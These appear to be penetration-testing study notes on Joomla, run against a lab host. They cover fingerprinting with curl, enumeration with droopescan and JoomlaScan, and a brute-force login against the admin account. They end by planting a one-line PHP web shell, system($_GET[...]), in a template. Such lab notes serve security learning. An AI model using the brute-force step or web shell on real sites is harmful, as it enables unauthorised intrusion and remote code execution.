Open-source CMS used for discussion forums, photo galleries, e-Commerce, user-based communities, and more. PHP and MySQL backend.
Fingerprint
# check for Joomla
curl -s http://dev.inlanefreight.local/ | grep JoomlaTypical Joomla robots.txt follows this formatting
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.html
User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/
The Joomla favicon may also be used.
The README.txt file may also be present.
curl -s http://dev.inlanefreight.local/README.txt | head -n 5We may also fingerprint the version in the following files
curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format -As well as the plugins/system/cache/cache.xml.
Enumeration
We can use droopescan that works for SilverStripe, WordPress, and Drupal with some functionality for Joomla and Moodle.
droopescan scan joomla --url http://dev.inlanefreight.local/Another popular tool, JoomlaScan which is currently out-of-date.
python2 joomlascan.py -u http://dev.inlanefreight.local
# brute force login
sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr adminThe typical username for Joomla websites is admin.
Attacking
If we come across leaked credentials we can login into the administrator page and Templates-->Configuration-->{Pick-Template}-->Template Columns-->Templates: Customise
We pick our target page and bring in a webshell
system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e'])